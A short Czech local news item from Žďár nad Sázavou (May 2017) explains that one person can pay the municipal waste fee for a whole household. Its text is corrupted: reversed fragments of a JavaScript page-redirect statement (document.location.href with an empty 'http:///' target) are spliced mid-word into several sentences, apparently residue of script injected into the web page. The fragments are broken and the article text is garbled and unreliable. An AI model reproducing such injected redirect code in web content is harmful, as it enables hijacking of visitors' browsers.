Rainbow page separator

Poplatky za odpady je možné sloučit pro celou domácnost

Pondělí, 8. května 2017

Odpad, komunální služby

Žďár nad Sázavou / Hned dvě složenky naráz, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na každé pololetí jednu, v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce dostali do svých schránek obyvatelé Žďáru pro zaplacení místního poplatku za svoz a zpracování komunálního odpadu. Za celou domácnost však může za odpady platit jenom jedna osoba, není třeba dostávat složenku pro každého rodinného příslušníka. „Žádáme všechny, kteří chtějí sloučit platby za odpady za více osob, aby nám [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to oznámili,“ uvedla vedoucí odboru komunálních služeb žďárské radnice Dana Wurzelová.
Za druhé pololetí má půlroční poplatek ve výši 290 korun splatnost do konce října. Pokud však dojde v údajích plátce uvedených na doručené složence ke změnám, je třeba je ohlásit městskému úřadu.